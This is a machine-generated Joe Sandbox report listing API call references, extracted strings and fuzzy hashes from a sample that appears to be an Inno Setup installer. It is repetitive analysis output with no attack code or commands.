                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                            • API String ID: 308859552-2052886881
                                                                                            • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                            • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                                            • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                            • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02193858,00000000), ref: 00458399
                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                            • API String ID: 2182916169-3012584893
                                                                                            • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                            • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                                            • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                            • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                            • API String ID: 1914119943-2711329623
                                                                                            • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                            • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                                            • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                            • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                                            APIs
                                                                                            • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                            • SaveDC.GDI32(?), ref: 00416E37
                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                            • DeleteObject.GDI32(?), ref: 00416F32
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                            • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                            • String ID:
                                                                                            • API String ID: 375863564-0
                                                                                            • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                            • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                            • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                            • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                            • String ID:
                                                                                            • API String ID: 1694776339-0
                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                            APIs
                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                                            • String ID:
                                                                                            • API String ID: 3985193851-0
                                                                                            • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                            • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                            • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                            • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                            APIs
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                                            • API String ID: 390214022-3415521383
                                                                                            • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                            • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                                            • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                            • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                                            • FreeLibrary.KERNEL32(03100000), ref: 0047FFD8
                                                                                            • SendNotifyMessageA.USER32(00010440,00000496,00002710,00000000), ref: 0048004A
                                                                                            Strings
                                                                                            • DeinitializeSetup, xrefs: 0047FED5
                                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                                            • Restarting Windows., xrefs: 00480025
                                                                                            • Deinitializing Setup., xrefs: 0047FE3A
                                                                                            • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                            • API String ID: 3817813901-1884538726
                                                                                            • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                            • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                                            • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                            • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                                            • GetActiveWindow.USER32 ref: 00460E53
                                                                                            • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                                            • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                                            • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                                            • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                                            • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                            • String ID: A
                                                                                            • API String ID: 2684663990-3554254475
                                                                                            • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                            • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                                            • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                            • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                                              • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                            • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                            • API String ID: 884541143-1710247218
                                                                                            • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                            • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                                            • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                            • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(03100000,inflateInit_), ref: 0045C9DD
                                                                                            • GetProcAddress.KERNEL32(03100000,inflate), ref: 0045C9ED
                                                                                            • GetProcAddress.KERNEL32(03100000,inflateEnd), ref: 0045C9FD
                                                                                            • GetProcAddress.KERNEL32(03100000,inflateReset), ref: 0045CA0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                            • API String ID: 190572456-3516654456
                                                                                            • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                            • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                                            • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                            • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                                            APIs
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                            • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                            • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$StretchText
                                                                                            • String ID:
                                                                                            • API String ID: 2984075790-0
                                                                                            • Opcode ID: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                            • Instruction ID: 2bdc14f7f78cb6bf094045e191087cf2cdbf471e5afceb3518b79a0be2d35765
                                                                                            • Opcode Fuzzy Hash: b6b7993ee34d591028293540005038157f95c366aa6f8393dbe83c10bd17739f
                                                                                            • Instruction Fuzzy Hash: 4E61E5B5A00105EFCB40EFADD985E9AB7F8AF08354B10816AF508DB261CB34ED44CF68
                                                                                            APIs
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00457470,?, /s ",?,regsvr32.exe",?,00457470), ref: 004573E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDirectoryHandleSystem
                                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                            • API String ID: 2051275411-1862435767
                                                                                            • Opcode ID: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                            • Instruction ID: cb1a7ae3e697987e935249ccafc7b98f7c309c2d79f12e82178ec20c33fcefbe
                                                                                            • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                            • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                                            APIs
                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                            • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                            • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
